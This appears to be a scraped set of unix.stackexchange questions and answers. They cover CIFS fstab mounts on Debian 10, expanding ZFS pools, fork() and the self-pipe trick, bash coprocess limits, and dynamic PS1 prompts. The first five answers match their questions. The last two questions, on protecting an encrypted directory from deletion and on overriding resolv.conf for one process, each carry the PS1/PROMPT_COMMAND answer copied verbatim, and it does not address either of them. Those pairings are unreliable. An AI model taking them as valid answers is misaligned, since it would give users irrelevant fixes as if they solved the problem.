530,900 | On all the Linuxes that I've tried before, whenever one puts something in /etc/fstab it gets automatically mounted when the machine is restarted, however after installing Debian 10, the same mechanism doesn't seem to work on it. The fstab entry looks like this: //hostname/Share /Share cifs _netdev,dir_mode=0777,file_mode=0777,username=<NAME>,password=<PASSWORD>,rw,uid=1000,gid=1000 0 0 After restart, the mount folder is empty and is not listed in the mounts. I looked at dmesg, and these are the only mentions of mounts or cifs: [ 3.067180] FS-Cache: Netfs 'cifs' registered for caching[ 3.067243] Key type cifs.spnego registered[ 3.067247] Key type cifs.idmap registered[ 3.068769] No dialect specified on mount. Default has changed to a more secure dialect, SMB2.1 or later (e.g. SMB3), from CIFS (SMB1). To use the less secure SMB1 dialect to access old servers which do not support SMB3 (or SMB2.1) specify vers=1.0 on mount. That dialect message doesn't come up at every restart, though. I had to add sudo mount -a to crontab @restart to get them to show up, but is there a more "proper" way for Debian 10 to recognize fstab the way other Debians do? | systemd will use the contents of the traditional /etc/fstab file to dynamically create "mount units". You'll need to check the status of the appropriate mount unit to see why it failed: please run systemctl status Share.mount . The most likely reason is that NetBIOS name resolution isn't available (i.e. Samba's nmbd isn't running yet) when the mount attempt happens, as suggested in the appropriate Debian Wiki page . See man systemd.mount for systemd-specific mount options you can use in /etc/fstab . For example, you might use x-systemd.automount as a workaround: with it, systemd should mount the filesystem automatically the first time something attempts to use it. Also, check systemctl status network-online.target : if you have a static network configuration, the system might be failing to detect when the network connection is properly "online", and attempt to mount network filesystems too early as a result. Check the new WAIT_ONLINE_IFACE= and WAIT_ONLINE_METHOD= settings in /etc/default/networking configuration file for possible ways to make the network online detection more reliable. Also, to silence the dialect message, you should add vers=N.N to your mount options. See man mount.cifs for the list of N.N values available and the corresponding Windows versions. If the server is at least Windows Server 2008R2, you can use vers=2.1 . The old protocol version vers=1.0 was vulnerable to the attack of the infamous WannaCry ransomware in year 2017, and it could not be fixed, so all up-to-date OSs should by now be programmed to hate that version and not use it unless specifically asked to. (If your server still cannot support any of the newer protocol versions, then that server needs to be upgraded.) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530900",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/222288/"
]
} |
530,968 | I am planning a storage server where users will store up to 20 TB of data. Since I have made some good experiences with ZFS on Linux, I would like to use that. However, I know that the amount of data will grow by several 100 GB per year, so at some point, I will need to increase my pool size. Since there is so much data, I am afraid that it will be quite a hassle to completely destroy the zpool and recreate it; so I wonder whether it would be possible to increase the pool capacity by adding more disks and keeping the existing ones. The pool will be RAIDZ-1 at least.Or is it true that it will be necessary to remove one disk after another and replace it with a larger one? no, I cannot believe that. How do larger servers than mine handle the increasing demand for more storage capacity? | There are basically two ways of growing a ZFS pool. Add more vdevs This is what user1133275 is suggesting in their answer . It's done with zpool add (which has basically the same syntax as zpool create does for specifying storage), and it works well for what it does. ZFS won't rebalance your stored data automatically, but it will start to write any new data to the new vdevs until the new vdev has about the same usage as the existing one(s). Once you've added a vdev to a pool, you basically cannot remove it without recreating the pool from scratch. All vdevs in a pool need to be above their respective redundancy thresholds for the pool to be importable. In other words, every vdev needs to be at least DEGRADED for the pool to function. Replace disks with larger ones This is what you're discussing in your question. It's the normal way of growing a ZFS pool when you have a pool layout that you are happy with. To replace a device with a new one, the new device needs to be at least as large as the old one. Operationally, you'd hook up the new disk along with the old, and then zpool replace the old disk with the new one. (This creates a temporary replacing device which becomes a parent to the old and new disk; when the resilver completes, the replacing device is removed from the device tree and it looks like the new device was there all along.) Once the resilver completes, the old disk can be removed from the system. Once all disks in a vdev are replaced by larger ones, you can expand the pool by running zpool online -e or by having the autoexpand property set to on (though I wouldn't really recommend the latter; pool expansion should be a conscious decision). So which way is better? That basically depends on your pool. As mentioned, the downside to having multiple vdevs is that they all need to be functional, so by adding vdevs you are actually, in a sense, reducing your safety margin. The upside, though, is that it's much easier to grow the pool piecemeal. Replacing devices in-place is basically the opposite; you don't need to keep as many vdevs functioning, but it isn't as easy to grow a pool piecemeal. For me, frankly, assuming for a second that you're using rotational hard disks (since this seems like bulk storage), 20 TB is still well within reason for a single vdev pool. My suggestion in your situation would be to get six drives of the 8 TB variety, and to set those up in a single raidz2 vdev. Doing so gives you a net storage capacity of around 32 TB, thus leaving you with an initial about 35% free, and the ability to lose any two drives before any of your data is at significant risk. You could also consider running eight 6 TB drives for a net storage capacity of around 36 TB and starting out at 45% free. (I'd consider 6-8 drives to be slightly on the large end for raidz1, but fine for raidz2.) Then plan to replace those drives either on a 4-5 year schedule (due to wear) or whenever the pool goes above about 80% full (because ZFS is much, much happier when it has good headroom). If your figures are accurate, you should be replacing those drives due to wear well before your pool starts getting full, while still allowing for a reasonable amount of unexpected growth in storage needs. When you replace the drives, you can decide whether you're happy with the pool size you've got based on then-current usage, or if you want to get larger drives and expand the pool. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530968",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/171284/"
]
} |
531,171 | On his web page about the self-pipe trick , Dan Bernstein explains a race condition with select() and signals, offers a workaround and concludes that Of course, the Right Thing would be to have fork() return a file descriptor, not a process ID. What does he mean by this -- is it something about being able to select() on child processes to handle their state changes instead of having to use a signal handler to get notified of those state changes? | The problem is described there in your source, select() should be interrupted by signals like SIGCHLD , but in some cases it doesn't work that well. So the workaround is to have signal write to a pipe, which is then watched by select() . Watching file descriptors is what select() is for, so that works around the problem. The workaround essentially turns the signal event into a file descriptor event. If fork() just returned an fd in the first place, the workaround would not be required, as that fd could then presumably be used directly with select() . So yes, your description in the last paragraph seems right to me. Another reason that an fd (or some other kind of a kernel handle) would be better than a plain process id number, is that PIDs can get reused after the process dies. That can be a problem in some cases when sending signals to processes, it might not be possible to know for sure that the process is the one you think it is, and not another one reusing the same PID. (Though I think this shouldn't be a problem when sending signals to a child process, since the parent has to run wait() on the child for its PID to be released.) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531171",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/169677/"
]
} |
531,198 | The intent of the test script 1 below is to start an "outer" coprocess (running seq 3 ), read from this coprocess in a while -loop, and for each line read, print a line identifying the current iteration of the outer loop, start an "inner" coprocess (also running seq , with new arguments), read from this inner coprocess in a nested while loop, and then clean up this inner coprocess. The nested while loop prints some output for each line it reads from the inner coprocess. #!/bin/bash# filename: coproctest.shPATH=/bin:/usr/bincoproc OUTER { seq 3; }SAVED_OUTER_PID="${OUTER_PID}"exec {OUTER_READER}<&"${OUTER[0]}"while IFS= read -r -u "${OUTER_READER}" OUTER_INDEX; do printf -- '%d\n' "${OUTER_INDEX}" START=$(( OUTER_INDEX * 1000000 )) FINISH=$(( START + OUTER_INDEX )) # ( coproc INNER { seq "${START}" "${FINISH}"; } SAVED_INNER_PID="${INNER_PID}" exec {INNER_READER}<&"{INNER[0]}" while IFS= read -r -u "${INNER_READER}" INNER_INDEX; do printf -- ' %d\n' "${INNER_INDEX}" done exec {INNER_READER}<&- wait "${SAVED_INNER_PID}" # )doneexec {OUTER_READER}<&-wait "${SAVED_OUTER_PID}" When I run this script, this is the output I get: % ./coproctest.sh1./coproctest.sh: line 30: warning: execute_coproc: coproc [12523:OUTER] still exists./coproctest.sh: line 19: INNER_READER: ambiguous redirect./coproctest.sh: line 21: read: : invalid file descriptor specification./coproctest.sh: line 25: INNER_READER: ambiguous redirect2./coproctest.sh: line 19: INNER_READER: ambiguous redirect./coproctest.sh: line 21: read: : invalid file descriptor specification./coproctest.sh: line 25: INNER_READER: ambiguous redirect3./coproctest.sh: line 19: INNER_READER: ambiguous redirect./coproctest.sh: line 21: read: : invalid file descriptor specification./coproctest.sh: line 25: INNER_READER: ambiguous redirect I get pretty much the same output if I uncomment the two commented lines. Q1: Is it possible to have multiple coprocesses running at the same time? Q2: If so, how should the script above be modified to achieve the desired output? 1 I've only recently started to work with coprocesses, and there is still a lot I don't understand. As a result, this script almost certainly contains incorrect, awkward, or unnecessary code. Please feel free to comment on and/or fix these weaknesses in your responses. | From the "BUGS" section at the very end of the bash manual: There may be only one active coprocess at a time. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/531198",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/10618/"
]
} |
531,294 | I'm using a function to dynamically generate output for PS1 . There are a couple statements that check if node and package.json exist, and if git and .git folder exist to display node version or the git branch. If none exist it just outputs the User$. The problem is when user goes into another folder where none of the conditions are met the prompt is not updating. It's like conditions are cached or smth function displayPS1() { MESSAGE=""; GRAY_BACK="\[\e[100;97m\]"; GREEN_BACK="\[\e[100;42m\]"; GREEN_FORE="\[\e[32;1m\]"; CYAN_BACK="\[\e[100;46m\]"; CYAN_FORE="\[\e[36;1m\]"; RESET="\[\e[0m\]"; if hash node 2>/dev/null && [ -e package.json ]; then NODE='$(node -v | sed "s/\(v[0-9]*\)\(\.[0-9]*\.[0-9]*\)/\1/g")'; MESSAGE="${GRAY_BACK} node ${GREEN_BACK} $NODE ${RESET} User${GREEN_FORE}$ ${RESET}"; elif hash git 2>/dev/null && [ -d .git ]; then BRANCH='$(cat .git/HEAD | sed "s/ref:[[:space:]]refs\/heads\///")'; MESSAGE="${GRAY_BACK} git ${CYAN_BACK} $BRANCH ${RESET} User${CYAN_FORE}$ ${RESET}"; else MESSAGE="User${CYAN_FORE}$ ${RESET}"; fi echo "$MESSAGE";}export PS1=$(displayPS1); | export PS1=$(displayPS1); This will run displayPS1 , and the if statements within once , assigning the result to the prompt. The conditions won't be processed again after that. Instead, put the function call in PROMPT_COMMAND , so it gets called every time the prompt is going to be printed. So either PROMPT_COMMAND='PS1=$(displayPS1)' or perhaps rather PROMPT_COMMAND=setPS1 and make setPS1 a function that sets PS1 itself. (Getting rid of the command substitution saves a fork from the subshell invocation every time the prompt is changed.) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531294",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/363363/"
]
} |
531,314 | I was able to encrypt a directory so that it can not be deleted. And I encrypted the file in the folder. But then I was able to delete the encrypted file in the encrypted folder, in which case, encrypting them was pointless b/c it did not save my file from being deleted. To encrypt the folder, I used "sudo mount -t decryptfs ~/file ~/file". During the process it asked me if I wanted a clear text passthrough and if I wanted to encrypt the file (I think that's what it was), but the program would only work if I put yes for #1, and no for #2. To encrypt the file I used "gpg -c filename". There must be a way to prevent the file from being deleted, or, not even being able to get to the file since I would think an encrypted folder would protect the contents, otherwise, what's the point. I looked for another way to encrypt, found vera-crypt, but that is for the entire hdd, apparently. Is there a simple solution here, or should I look for a completely different method for encrypting the directory? Thank you. | export PS1=$(displayPS1); This will run displayPS1 , and the if statements within once , assigning the result to the prompt. The conditions won't be processed again after that. Instead, put the function call in PROMPT_COMMAND , so it gets called every time the prompt is going to be printed. So either PROMPT_COMMAND='PS1=$(displayPS1)' or perhaps rather PROMPT_COMMAND=setPS1 and make setPS1 a function that sets PS1 itself. (Getting rid of the command substitution saves a fork from the subshell invocation every time the prompt is changed.) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531314",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/356799/"
]
} |
531,322 | I want to cheat a program to use a special /etc/resolv.conf file, that in turn will force it to use a nonstandard nameserver. The obvious solution is to recreate the whole filesystem except one file and use a chroot. But may be there is a simpler hack for doing this. how to change a file's content for a specific process only? gives solutions that work in many cases, but not for /etc/resolv.conf : LD_PRELOAD doesn't catch when the resolver inside libc opens /etc/resolv.conf , and a bind mount doesn't work to override a symbolic link (if the link target is missing or when the link is changed afterwards). EDIT: A relevant question is How do I mount a file on top of a broken symbolic link? and there is no universal solution found | export PS1=$(displayPS1); This will run displayPS1 , and the if statements within once , assigning the result to the prompt. The conditions won't be processed again after that. Instead, put the function call in PROMPT_COMMAND , so it gets called every time the prompt is going to be printed. So either PROMPT_COMMAND='PS1=$(displayPS1)' or perhaps rather PROMPT_COMMAND=setPS1 and make setPS1 a function that sets PS1 itself. (Getting rid of the command substitution saves a fork from the subshell invocation every time the prompt is changed.) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/531322",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/174081/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.